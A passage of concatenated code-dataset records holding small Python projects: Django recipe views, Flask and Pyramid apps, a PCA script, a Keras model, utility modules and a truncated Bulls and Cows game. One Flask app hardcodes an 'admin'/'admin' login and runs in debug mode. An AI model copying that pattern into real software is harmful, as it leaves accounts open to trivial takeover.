'Images':images[0], \"Ingredients\":ingredients[0]})\n\ndef overview(request):\n    recipes = Recipe.objects.filter()\n    images = []\n    ingredients = []\n    for recipe in recipes:\n        img = recipe.images.all()\n        if img:\n            images.append(img[0])\n        else:\n            images.append(Images())\n        ingredients.append(list(recipe.ingredients.all()))\n    return render(request, 'RecipeApp/overview.html', {'Recipes':recipes, 'Images':images, \"Ingredients\":ingredients})\n\ndef search_single(request,pk):\n    recipe = get_object_or_404(Recipe,pk=pk)\n    images = []\n    ingredients = []\n    img = recipe.images.all()\n    if img:\n        images.append(img[0])\n    else:\n        images.append(Images())\n\n    ingredients.append(list(recipe.ingredients.all()))\n    return render(request, 'RecipeApp/single.html', {'Recipes':recipe, 'Images':images[0], \"Ingredients\":ingredients[0]})\n\ndef save_favourite(request,pk):\n    user = request.user\n    url = request.META['HTTP_REFERER']\n    cook = Cook.objects.filter(user=user)[0]\n    recipe = get_object_or_404(Recipe,pk=pk)\n    cook.saved_recipe.add(recipe)\n    images = []\n    ingredients = []\n    img = recipe.images.all()\n    if img:\n        images.append(img[0])\n    else:\n        images.append(Images())\n\n    ingredients.append(list(recipe.ingredients.all()))\n    return render(request,'RecipeApp/single.html',{'Recipes':recipe, 'Images':images[0], \"Ingredients\":ingredients[0], 'Added':True})\n\ndef category(request,pk):\n    cats = [\"vegetarian\",\"veryHealthy\",\"vegan\",\"veryPopular\"]\n    c = int(pk)\n    print(c)\n    cate = cats[c]\n    print(cate)\n    cat = Category.objects.filter(name = cate, value = True)\n    response = Recipe.objects.filter(categories__in=cat).order_by(\"-created_at\")[:8]\n    images = []\n    ingredients = []\n    for recipe in response:\n        img = recipe.images.all()\n        if img:\n            images.append(img[0])\n        else:\n            images.append(Images())\n        ingredients.append(list(recipe.ingredients.all()))\n\n    return render(request, 'RecipeApp/category.html', {'Recipes':response, 'Images':images, \"Ingredients\":ingredients, \"Title\":cate})\n\ndef search(request):\n    if request.method == 'POST':\n        query = request.POST.get('query')\n        kitchen = request.POST.get('kitchen')\n        dish = request.POST.get('dish')\n        al = request.POST.get('al')\n        ingredients = request.POST.get('ingredients')\n        ex_ingredients = request.POST.get('exclude_ingredients')\n        response = searchRecipes(query,kitchen,dish,al,ingredients,ex_ingredients)\n        images = []\n        ingredients = []\n        for recipe in response:\n
            if dish!= \"none\":\n                new_dish = Dish.objects.filter(name=dish)\n                if not new_dish:\n                    new_dish = Dish.objects.create(name=dish)\n                else:\n                    new_dish =new_dish[0]\n                recipe.dish = new_dish\n            if kitchen!= \"none\":\n                new_country = Country.objects.filter(name=kitchen)\n                if not new_country:\n                    new_country = Country.objects.create(name=kitchen)\n                else:\n                    new_country = new_country[0]\n                recipe.country = new_country\n            img = recipe.images.all()\n            if img:\n                images.append(img[0])\n            else:\n                images.append(Images())\n            ingredients.append(list(recipe.ingredients.all()))\n        return render(request, 'RecipeApp/search.html', {'Recipes':response, 'Images':images, \"Ingredients\":ingredients})\n\n\n\n    return render(request, 'RecipeApp/search.html', {})\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef register_view(request):\n    registered = False\n    error = False\n    if request.method == 'POST':\n        username = request.POST['username']\n        password = request.POST['password']\n        fname = request.POST['fname']\n        lname = request.POST['lname']\n        email = request.POST['email']\n        try: user = User.objects.create_user(username, email, password)\n        except: error=True\n        if not error:\n            user.save()\n            try: cook = Cook.objects.create(user = user, fname = fname, lname = lname)\n            except: error=True\n            registered = True\n    else:\n        user_form = UserForm()\n    return render(request,'RecipeApp/register.html', {'error':error, 'registered': registered})\n\n@login_required\ndef logout_view(request):\n    done = logout(request)\n    return render(request,'RecipeApp/login.html', {'result': \"Logged OUT!\"})\n\n\ndef login_view(request):\n    try:user = Cook.objects.filter(user=request.user)[0]\n    except: user = None\n    if request.method == 'POST':\n        username = request.POST['username']\n        password = request.POST['password']\n        user = authenticate(username=username, password=password)\n        if user:\n            if user.is_active:\n                login(request,user)\n                user=Cook.objects.filter(user=user)[0]\n                prev = request.META['HTTP_REFERER']\n                return redirect('/mypage/')\n            else:\n                return render(request,'RecipeApp/login.html', {'result': \"Your account was disabled.\"})\n        else:\n            return render(request,'RecipeApp/login.html', {'result': \"Your username and password didn't match, please try again.\", })\n    else:\n        return render(request,'RecipeApp/login.html', {'user':user})\n","sub_path":"RecipeApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"221817496","text":" \nfrom wsgiref.simple_server import make_server\nfrom pyramid.config import Configurator\nfrom pyramid.events import NewRequest\nfrom pyramid.events import NewResponse\nfrom pyramid.events import subscriber\nfrom pyramid.response import Response\nfrom pyramid.view import view_config\n\n\n@view_config(\n    route_name='home',\n)\ndef home(request):\n    return Response('Welcome!')\n\n# 1) \n# @subscriber(NewRequest, NewResponse)\n# def mysubscriber(event):\n#     print('event NewRequest/NewResponse ', event)\n\n# 2)\n@subscriber(NewRequest)\ndef mysubscriber1(event):\n    print('event NewRequest ', event)\n\n# 3)\n@subscriber(NewResponse)\ndef mysubscriber2(event):\n    print('event NewResponse ', event)\n\nif __name__ == '__main__':\n    with Configurator() as config:\n        config.add_route('home', '/')\n        config.scan()\n        app = config.make_wsgi_app()\n    server = make_server('0.0.0.0', 6543, app)\n    server.serve_forever()\n\n    ","sub_path":"python/pyramid/helloWorld/server events 
manager.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"619637851","text":"\"\"\"Test document.\"\"\"\n# mylist = [1,2,3,4,5,6,7,8]\n#\n# def even_bool(num):\n# return num%2 == 0\n#\n# evens = filter(even_bool,mylist)\n# print(list(evens))\n\n\n###lambda expression\n# evens = filter(lambda num:num%2 == 0, mylist)\n# print(list(evens))\n\n# #str splits\n# tweet = \"Go Sports! #Sports\"\n# result = tweet.split('#')[1]\n# print(result)\n\n# #in example\n# print('x' in [1,2,3,'x'])\n\n\n# def stringBits(mystring):\n# return mystring[::2]\n#\n# print(stringBits('whats up'))\n\n\n# def end_other(a, b):\n# a = a.lower()\n# b = b.lower()\n# # return (b.endswith(a) or a.endswith(b))\n# return a[-len(b):] == b or a == b[-len(a):]\n#\n# x = end_other('eftg', 'dsfadfdfdfdafdeft')\n# print(x)\n#\n# def doubleChar(mystring):\n# result = \"\"\n# for i in mystring:\n# result += i*2\n# print(result)\n#\n# doubleChar('Hi-There')\n\n# def no_teen_sum(a, b, c):\n# return fix_teen(a) + fix_teen(b) + fix_teen(c)\n#\n# # CODE GOES HERE\n# def fix_teen(n):\n# if n in [13,14,17,18,19]:\n# return 0\n# return n\n#\n# print(no_teen_sum(2, 1, 14))\n#\n# mylist = [1,2,3,4,5,6,7,8]\n#\n# def even_bool(num):\n# return num%2 == 0\n#\n# evens = filter(even_bool,mylist)\n# print(list(evens))\n\n\ndef count_evens(nums):\n result = 0\n for i in nums:\n if i % 2 == 0:\n result += 1\n return result\n\nprint(count_evens([2, 1, 2, 3, 4]))\n","sub_path":"Django-Python-Full-Stack-Web-Devloper-master/Python_Level_One/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"247892478","text":"from flask import Flask,render_template,request,url_for\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef index():\r\n\tbase = {\r\n\t\t'title':'Index'\r\n\t}\r\n\treturn render_template(\"index.html\",base=base)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tapp.run(debug=True,port=8070)\r\n","sub_path":"lecture0/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"264380366","text":"import time\r\nfrom shared.classes import ActivityMonitor\r\nfrom daemons.miscellaneous import DictccCrawler, MonitorVPN\r\n\r\ndaemons = [DictccCrawler(list_name=\"Wörter\"), MonitorVPN()]\r\n\r\nif __name__ == \"__main__\":\r\n activity_monitor = ActivityMonitor()\r\n # tell all daemons to use the same ActivityMonitor instance\r\n [daemon.set_activity_monitor(activity_monitor) for daemon in daemons]\r\n\r\n daemons.append(activity_monitor)\r\n while True:\r\n for daemon in daemons:\r\n daemon.run()\r\n time.sleep(1)\r\n","sub_path":"2021-10-03/Daemons/run_miscellaneous_daemons.py","file_name":"run_miscellaneous_daemons.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"419580788","text":"from django.urls import path\nfrom Bigflow.BranchExp import views\n#from Bigflow.BranchExp import tasks\nfrom django.conf.urls import url, include\n\n\nurlpatterns = [\n url(r'^BranchExp/(?P<template_name>[\\w-]+)/$', views.Branch_Template , name='Branch_Template'),\n #url(r'^BranchExp/(?P<template_name>[\\w-]+)/$', views.Branch_Template , name='Branch_Template'),\n path('Get_expense/', views.Get_expense , name='Get_expense'),\n 
path('Set_expense/', views.Set_expense , name='Set_expense'),\n path('Set_premises/', views.Set_premises , name='Set_premises'),\n path('Get_premises/', views.Get_premises , name='Get_premises'),\n path('test/', views.test, name='Invoiceheader_set'),\n path('change_value/', views.change_value, name='change_value'),\n path('change_value_l/', views.change_value_l, name='change_value_l'),\n path('insertNewBranchDetails/', views.insertNewBranchDetails, name='insert_branch_details_values'),\n path('GetpropertyType/', views.brGetPropertyType, name='Br_Get_Property_Type'),\n path('get_pr_details/', views.brGetPropertyDetails, name='Br_Get_Property_Details'),\n path('get_category_subcategory/', views.get_category_subcategory, name='Category_SubCategory'),\n path('get_branch_data/', views.get_branch, name='Category_SubCategory'),\n path('get_branch_data/', views.get_branch, name='Category_SubCategory'),\n path('get_BranchExp_Meta_Data/', views.get_BranchExp_Meta_Data, name='get_BranchExp_Meta_Data'),\n path('set_schedule/', views.task_number_one, name='set_schedule'),\n path('Session_Set_Expense_Data/', views.Session_Set_Expense_Data, name='Session_Set_Expense_Data'),\n path('Session_Get_Expnese_Data/', views.Session_Get_Expnese_Data, name='Session_Get_Expnese_Data'),\n # path('Invoiceheader_set/', views.Invoiceheader_set, name='Invoiceheader_set'),\n\n #Br_Makersummary -#Br_RentCreate\n\n # path('Expense_Process',view_branchexp.Expense_Process.as_view()),\n # path('Expense_ProcessSet',view_branchexp.Expense_Process_Set.as_view())\n\n\n\n]","sub_path":"Bigflow/BranchExp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"44930086","text":"''' <!-- Adrian McNulty G00328962 SPA --> '''\nfrom flask import Flask, render_template, g, request, url_for, session, redirect, flash\nfrom functools import wraps\nimport sqlite3\nimport os #This is for the secret key\napp = Flask(__name__)\napp.database = \"data/formData.db\"\n# ideally you should use a random key generator to generate a secret key for security reasons\n# but for this project we won't\n# Session key proctects the session being accessed on the clients side\n#In order to use sessions you have to set a secret key\napp.secret_key =os.urandom(24)\n\n@app.route('/')\ndef index():\n # establishes a connection to the database\n g.db = connect_db()\n # executes a query\n cur = g.db.execute('select * from results')\n #parse the data returned from the database using a dictionary\n posts = [dict(jackpot=row[0], winners=row[1]) for row in cur.fetchall()]\n g.db.close()\n # Render the home page template to show the data\n return render_template(\"homePage.html\", posts = posts)\n\n@app.route('/forum')\ndef forum():\n #establishes a connection to the database\n g.db = connect_db()\n #executes a query\n cur = g.db.execute('select * from postData')\n # parse the data returned from the database using a dictionary\n posts = [dict(name=row[0], message=row[1]) for row in cur.fetchall()]\n g.db.close()\n # Render the home page template to show the data\n return render_template(\"forum.html\", posts=posts)\n\n# Login required Decorator\ndef login_required(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n if 'logged_in' in session:\n return f(*args, **kwargs)\n else:\n flash('You Need To Login First')\n return redirect(url_for('login'))\n return wrap\n\n\n@app.route('/form', methods = ['GET','POST'])\ndef form():\n if request.method == 'POST':\n 
name = request.form['nameInput']\n        message = request.form['messageInput']\n        g.db = connect_db()\n        g.db.execute('INSERT INTO postData values(?,?)', (name, message))\n        g.db.commit()\n        g.db.close()\n        #if request is a post redirect to forum\n        return redirect(url_for('forum'))\n    else:\n        #otherwise render form template\n        return render_template(\"form.html\")\n\n@app.route('/formEntry', methods = ['GET','POST'])\n@login_required\ndef formEntry():\n    if request.method == 'POST':\n        position = request.form['positionInput']\n        names = request.form['namesInput']\n        g.db = connect_db()\n        g.db.execute('update results set jackpot=?,winners=? ', (position, names))\n        g.db.commit()\n        g.db.close()\n    return render_template(\"formEntry.html\")\n\ndef connect_db():\n    return sqlite3.connect(app.database)\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n    error = None\n    if request.method == 'POST':\n        if request.form['username'] != 'admin' or request.form['password'] != 'admin':\n            flash('Invalid Credentials - Please Try Again!')\n        else:\n            # if the users credentials are correct then the value true is assigned to logged in key\n            session['logged_in'] = True\n            return redirect(url_for('formEntry'))\n    return render_template(\"login.html\", error=error)\n\n#This is the log out function. The secret key is deleted once session.pop() sets\n#the value of the key to false\n@app.route('/logout')\n@login_required\ndef logout():\n    session.pop('logged_in', None)\n    return redirect(url_for('index'))\n\n#Run the app\nif __name__ == '__main__':\n    app.run(debug=True)","sub_path":"Data-Rep-Project/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"408203086","text":"import os\nimport cv2\nimport numpy as np\n\n\ndata_path = 'C:\\\\Users\\\\sunsisi\\\\Desktop\\\\8_data'\nsave_path = 'C:\\\\Users\\\\sunsisi\\\\Desktop\\\\pca_data'\ntypes = []\nids = []\nnum = []\n\n\ndef pca(df, k):\n    mean = np.mean(df, axis=0)\n    new_df = df - mean\n    print('mean')\n    cov = np.cov(new_df, rowvar=0)\n    print('cov')\n    eigVals, eigVects = np.linalg.eig(cov)\n    print('valvec')\n    eigValIndic = np.argsort(-eigVals)\n    print('sort')\n    n_eigValIndic = eigValIndic[:k]\n    n_eigVect = eigVects[:, n_eigValIndic]\n    print('choose')\n    data_ret = df.dot(n_eigVect)\n    data_ret = np.array(data_ret)\n    return data_ret, n_eigVect\n    # return data_ret\n\n\ndef PCA(x, k):\n    # 1. Remove the mean: the column sums divided by n give each dimension's mean, which is then subtracted\n    avg = np.sum(x, axis=0, keepdims=True)\n    n = len(x)\n    avg = avg/n\n    x = np.subtract(x, avg)\n\n    # 2. Compute the covariance, eigenvalues and eigenvectors\n    tx = np.transpose(x)\n    S = np.matmul(tx, x)\n    val, vec = np.linalg.eig(S)\n\n    # 3. Pick the top eigenvectors\n    # sum_val = np.sum(val)\n    index = np.argsort(-val)\n    pic_val = val[index[:k]]\n    pic_vec = vec[:, index[:k]]\n\n    return np.matmul(x, pic_vec), pic_vec\n    # return np.matmul(x, pic_vec)\n\n\ndef load_data():\n    x = []\n    global types, ids, num\n    types = os.listdir(data_path)\n    for t in types:\n        labels = os.listdir(os.path.join(data_path, t))\n        ids = ids + labels\n        num.append(len(labels))\n        for label in labels:\n            img_paths = os.listdir(os.path.join(data_path, t, label))\n            array = []\n            for img_name in img_paths:\n                img = cv2.imread(os.path.join(data_path, t, label, img_name), 0)\n                img = cv2.resize(img, (32, 32))\n                array.append(np.array(img).flatten())  # flatten the 2D image into a 1D vector\n\n            x.append(np.array(array).flatten())\n\n    return np.array(x)\n\n\ndef save_data(x):\n    if not os.path.exists(os.path.join(save_path)):\n        os.makedirs(os.path.join(save_path))\n\n    x = 
np.real(x)\n    max_ = x.max()\n    min_ = x.min()\n    x = (x - min_) / (max_ - min_) * 256\n    x = x.astype(np.uint8)\n    k = 0\n    for t, n in zip(types, num):\n        if not os.path.exists(os.path.join(save_path, t)):\n            os.makedirs(os.path.join(save_path, t))\n        for i in range(n):\n            np.savetxt(os.path.join(save_path, t, ids[k]), x[k], fmt=\"%d\")\n            k = k + 1\n\n\n# dimensionality reduction\nif __name__ == '__main__':\n    x = load_data()\n    print(x.shape)\n    train_x = x[num[0]:len(x)]\n    print(train_x.shape)\n    new_train_x, w = pca(train_x, 400)\n    x = x.dot(w)\n    save_data(x)\n","sub_path":"DataMiningAndAnalysis/lab2/PCA.py","file_name":"PCA.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"190496284","text":"class Sample:\n    def display(self):\n        print(\"In display function of sample\")\nclass Example(Sample):\n    def show(self):\n        print(\"In show function of sample\")\nobj=Example()\nobj.display()\nobj.show()\ninput()\n","sub_path":"basics/Python/Class/class_sample-inheritance.py","file_name":"class_sample-inheritance.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"127162259","text":"import os\nfrom bs4 import BeautifulSoup\n\nthis_dir = os.path.abspath(os.getcwd()) + '/first_step/'\nfile_names = ['first', 'second', 'third']\n\ndef wrong_answer_txt(file_name):\n    ''''''\n    file_input = this_dir + 'txts/' + str(file_name) + '.txt'\n    matrix = open(file_input, 'r').read()\n    numbers = matrix.split()\n    result = 0\n    for elem in numbers:\n        result += int(elem)\n    return result\n\ndef wrong_not_gut_answer_html(file_name):\n    ''''''\n    file_input = this_dir + 'htmls/' + str(file_name) + '.html'\n    html_file = open(file_input).read()\n    html_context = str(html_file).split()\n    result = 0\n    for elem in html_context:\n        if elem.isdigit(): result += int(elem)\n    return result\n\n# def as_needed_bs4(file_name):\n#     file_input = this_dir + 'htmls/' + str(file_name) + '.html'\n#     html_file = BeautifulSoup(file_input.encode('utf-8'), 'html.parser')\n#     print(html_file)\n\ndef output(file_name):\n    print(file_name + ':')\n    print(wrong_answer_txt(file_name))\n    # print(wrong_not_gut_answer_html(file_name))\n    print('\\n')\n\n# as_needed_bs4('first')\n\nfor files in file_names:\n    output(files)\n    ","sub_path":"first_step/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"605901734","text":"import sys\nsys.path.append(\"/home/alesya/Downloads/KLayout-python-shamil_dev_sfs\")\n\nimport ClassLib\n\nfrom ClassLib.ContactPad import *\nfrom ClassLib.Resonators import *\nfrom time import time\nfrom pya import DText\nfrom ClassLib._PROG_SETTINGS import *\n\nfrom sonnetSim.matlabClient import MatlabClient\nfrom sonnetSim.pORT_TYPES import PORT_TYPES\nimport sonnetSim.sonnetLab\nfrom sonnetSim.sonnetLab import SonnetPort, SimulationBox, SonnetLab\nfrom sonnetSim.cMD import CMD\n\n\nclass CHIP:\n    dx = 600e3\n    dy = 600e3\n\n\napp = pya.Application.instance()\nmw = app.main_window()\nlv = mw.current_view()\ncv = None\n\n#this ensures that lv and cv are valid objects\nif( lv == None ):\n    cv = mw.create_layout(1)\n    lv = mw.current_view()\nelse:\n    cv = lv.active_cellview()\n    \ncell_name = \"Transmon\"\nprint(cell_name)\n\n\nlayout = cv.layout()\nlayout.dbu = 0.001\nif not layout.has_cell(cell_name):\n    layout.create_cell(cell_name)\n\ncv.cell_name = cell_name\ncell = 
cv.cell\n\ninfo = pya.LayerInfo(1,0)\ninfo2 = pya.LayerInfo(2,0)\nlayer_photo = layout.layer( info )\nlayer_el = layout.layer( info2 )\n\n# clear this cell and layer\ncell.clear()\n\n# setting layout view\n#lv.select_cell(cell.cell_index(), 0)\nlv.add_missing_layers()\n\n\n#Constants\n\nground = pya.Box(0, 0, CHIP.dx, CHIP.dy)\ncanvas = Region(ground)\n\nebeam = Region()\n\n\n#DRAW\n\nxmon_cpw_params = CPWParameters(20e3, 10e3)\n\narms_vert_len = 144.3e3\narms_hor_len = 200e3\nJJ_site_span = 8e3\nh_JJ = 278\nw_JJ = 150\nasymmetry = 0.5\n\ntmon = Xmon(DPoint(-10e3, CHIP.dy/2), xmon_cpw_params, arms_vert_len, arms_hor_len, JJ_site_span,\n            h_JJ, w_JJ, asymmetry)\n\ntmon.place(canvas, region_name = \"photo\")\ntmon.place(ebeam, region_name = \"ebeam\")\n\nc_params = [10e3, 20e3]\nc_gamma_ef = Capacitor_small(tmon.end-DPoint(8e3,0), c_params, 18e3, 20e3, 10e3)\nc_gamma_ef.place(canvas)\n\nR = 200e3\nl = CHIP.dx-c_gamma_ef.end.x\nfeedline_cp1 = CPW_RL_Path(c_gamma_ef.end, \"L\", xmon_cpw_params, R, \n                           [l], [])\nfeedline_cp1.place(canvas)\n\n\ncell.shapes( layer_photo ).insert(canvas)\ncell.shapes( layer_el ).insert(ebeam)\n\nlv.zoom_fit()\n\n\n","sub_path":"Projects/Transmon lasing/Transmon and g_ge capacitor.py","file_name":"Transmon and g_ge capacitor.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"648930707","text":"\"\"\"\r\nA multiplication challenge, write a multiplication table in as simple a way as possible.\r\nCompleted for a discord server.\r\n\r\n@author hornetfighter515\r\n\"\"\"\r\ndef main():\r\n    for i in range(0,11):\r\n        for j in range(0,11):\r\n            operand_i = i\r\n            if(i==0):\r\n                operand_i = 1\r\n            \r\n            operand_j = j\r\n            if(j==0):\r\n                operand_j = 1\r\n\r\n            result = operand_i*operand_j\r\n            if(i==0 and j==0):\r\n                result = \"X\"\r\n            print(str( result)+ '\\t', end='')\r\n        print()\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n","sub_path":"mult_table.py","file_name":"mult_table.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"652283029","text":"import os\nimport sys\n\ntry:\n    from PySide import QtGui\n    import pysideuic\nexcept:\n    raw_input('PySide not found!')\n    sys.exit(0)\n\n\nclass Window(QtGui.QWidget):\n\n    def __init__(self):\n        super(Window, self).__init__()\n\n        self.initUI()\n\n    def initUI(self):\n\n        fileName = QtGui.QFileDialog.getOpenFileName(self, 'Open UI File',\n                                                     '../..', 'UI File (*.ui)')\n        if fileName:\n            uiFile = open(fileName[0], 'r')\n\n            parentdir = os.path.abspath(os.path.join(fileName[0], os.pardir))\n            filename = os.path.basename(os.path.splitext(fileName[0])[0])\n\n            pyFile = open(os.path.join(parentdir, filename) + '.py', 'w')\n\n            pysideuic.compileUi(uiFile, pyFile)\n\n            uiFile.close()\n            pyFile.close()\n\n        sys.exit(0)\n\nif __name__ == '__main__':\n\n    app = QtGui.QApplication(sys.argv)\n    win = Window()\n    sys.exit(app.exec_())\n","sub_path":"System/pyside/compiler.py","file_name":"compiler.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"86735234","text":"import sys, os\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom UcsBase import ManagedObject\nsys.path.remove(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nclass EventEpCtrl(ManagedObject):\n\tdef 
__init__(self):\n\t\tManagedObject.__init__(self,\"EventEpCtrl\")\n\n\t@staticmethod\n\tdef ClassId():\n\t\treturn \"eventEpCtrl\"\n\n\tDN = \"Dn\"\n\tLEVEL = \"Level\"\n\tREVERT_TIMEOUT = \"RevertTimeout\"\n\tRN = \"Rn\"\n\tSTATUS = \"Status\"\n\n\tCONST_LEVEL_CLEARED = \"cleared\"\n\tCONST_LEVEL_CONDITION = \"condition\"\n\tCONST_LEVEL_CRITICAL = \"critical\"\n\tCONST_LEVEL_INFO = \"info\"\n\tCONST_LEVEL_MAJOR = \"major\"\n\tCONST_LEVEL_MINOR = \"minor\"\n\tCONST_LEVEL_WARNING = \"warning\"\n\tCONST_REVERT_TIMEOUT_FOREVER = \"forever\"\n","sub_path":"UcsSdk-0.8.3/src/UcsSdk/MoMeta/EventEpCtrl.py","file_name":"EventEpCtrl.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"61870584","text":"import os\nimport re\nfrom config import _PACKAGES, _INSTALLED_PACKAGES, SUBLIME_VERSION\nimport sublime\n\n\n# Thanks to Package Control for these two snippets of code\n# https://github.com/wbond/sublime_package_control/blob/master/package_control/package_manager.py\ndef list_default_packages():\n \"\"\" :return: A list of all default package names\"\"\"\n\n if int(sublime.version()) > 3000:\n bundled_packages_path = os.path.join(os.path.dirname(sublime.executable_path()),\n 'Packages')\n files = os.listdir(bundled_packages_path)\n\n else:\n files = os.listdir(os.path.join(os.path.dirname(_PACKAGES),\n 'Pristine Packages'))\n files = list(set(files) - set(os.listdir(\n _INSTALLED_PACKAGES)))\n packages = [file.replace('.sublime-package', '') for file in files]\n packages = sorted(packages, key=lambda s: s.lower())\n return packages\n\n\ndef installed_packages(unpacked_only=False):\n \"\"\"\n :param unpacked_only:\n Only list packages that are not inside of .sublime-package files\n\n :return: A list of all installed, non-default, package names\n \"\"\"\n\n package_names = os.listdir(_PACKAGES)\n package_names = [path for path in package_names if path[0] != '.' 
and os.path.isdir(os.path.join(_PACKAGES, path))]\n\n    if SUBLIME_VERSION > 3000 and unpacked_only == False:\n        package_files = os.listdir(_INSTALLED_PACKAGES)\n        package_names += [f.replace('.sublime-package', '') for f in package_files if re.search('\.sublime-package$', f) != None]\n\n    # Ignore things to be deleted\n    ignored = ['User']\n    for package in package_names:\n        cleanup_file = os.path.join(_PACKAGES, package, 'package-control.cleanup')\n        if os.path.exists(cleanup_file):\n            ignored.append(package)\n\n    packages = list(set(package_names) - set(ignored) - set(list_default_packages()))\n    packages = sorted(packages, key=lambda s: s.lower())\n\n    return packages\n","sub_path":"local_packages_api.py","file_name":"local_packages_api.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"407795282","text":"from datetime import datetime\nimport logging.handlers\nimport logging\nimport os\nimport sys\n\n\ndef script_path():\n    path = os.path.realpath(sys.argv[0])\n    if os.path.isfile(path):\n        path = os.path.dirname(path)\n    return os.path.abspath(path)\n\n\nLOGGING_MSG_FORMAT = \"%(asctime)s [%(levelname)s] %(filename)s %(lineno)s: %(message)s\"\nLOGGING_DATE_FORMAT = '%Y-%m-%d %H:%M:%S'\nlogging.basicConfig(level=logging.INFO, format=LOGGING_MSG_FORMAT, datefmt=LOGGING_DATE_FORMAT)\nlog = logging.getLogger(\"easytrader\")\nlog.propagate = False\n\n#file log\nlog_path = os.path.join(script_path(), 'logs')\nif not os.path.exists(log_path):\n    os.makedirs(log_path)\nfile_name = datetime.now().strftime(\"%Y-%m-%d\") + \".log\"\nlog_file = os.path.join(log_path, file_name)\nfh = logging.handlers.TimedRotatingFileHandler(log_file, 'midnight', 1, 3)\nfh.suffix = '%Y%m%d.log'\nfh.setFormatter(logging.Formatter(LOGGING_MSG_FORMAT))\nlog.handlers.append(fh)\n\n#console log\nch = logging.StreamHandler()\nch.setFormatter(logging.Formatter(LOGGING_MSG_FORMAT))\nlog.handlers.append(ch)\n","sub_path":"easytrader/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"449156667","text":"from keras.layers import Input, Conv3D, Dense, MaxPooling3D, Dropout\nfrom keras.models import Model\n\n\nclass FusionNet3dBuilder(object):\n\n    @staticmethod\n    def build(input_shape, num_classes=1):\n\n        if len(input_shape) != 4:\n            raise ValueError(\"Input shape must have 4 channels\")\n\n        input_img = Input(input_shape)\n        print(input_img)\n        conv1 = Conv3D(64, kernel_size=(3, 3, 32),\n                       activation='relu')(input_img)\n        print(conv1)\n        maxpool1 = MaxPooling3D(pool_size=(2, 2, 1))(conv1)\n        print(maxpool1)\n        conv2 = Conv3D(64, kernel_size=(3, 3, 32),\n                       activation='relu')(maxpool1)\n        print(conv2)\n        conv3 = Conv3D(64, kernel_size=(3, 3, 32), activation='relu')(conv2)\n        print(conv3)\n        maxpool2 = MaxPooling3D(pool_size=(2, 2, 1))(conv3)\n        print(maxpool2)\n        dropout = Dropout(0.5)(maxpool2)\n        dense1 = Dense(2048, activation='relu')(dropout)\n        print(dense1)\n        output_img = Dense(num_classes, activation='softmax')(dense1)\n        print(output_img)\n\n        model = Model(inputs=input_img, outputs=output_img)\n        return model\n\n\nmodel = FusionNet3dBuilder.build((32, 32, 32, 1))\nprint(model.summary())\n","sub_path":"ml/models/three_d/fusion_net3d.py","file_name":"fusion_net3d.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"561927567","text":"## Author Name: Flynn Gaur\n## 
Description: This program emulates a game similar\n##              to a standard game of Bulls and Cows. \n##              The players have to keep on guessing \n##              until they get it right.\n\nfrom os import _exit as exit\nprint('-----------------------------------------')\nprint('------- WELCOME TO BULLS AND COWS -------')\nprint('-----------------------------------------')\nPlayer1=input('Player 1, enter your username:\n')\nPlayer2=input('Player 2, enter your username:\n')\ncode1=input(Player1+', enter your code:\n') #code to be guessed by player 2\nif len(code1)!=3:\n    print(Player1+', that code is not valid. Exiting.')\n    exit(0)\nif code1.islower()==False or code1.isalpha()==False: #to check if its from a-z\n    print(Player1+', that code is not valid. Exiting.')\n    exit(0)\nif code1[0]==code1[1] or code1[1]==code1[2] or code1[0]==code1[2]: \n    print(Player1+', that code is not valid. Exiting.') #to check if the characters aren't the same\n    exit(0)\ncode2=input(Player2+', enter your 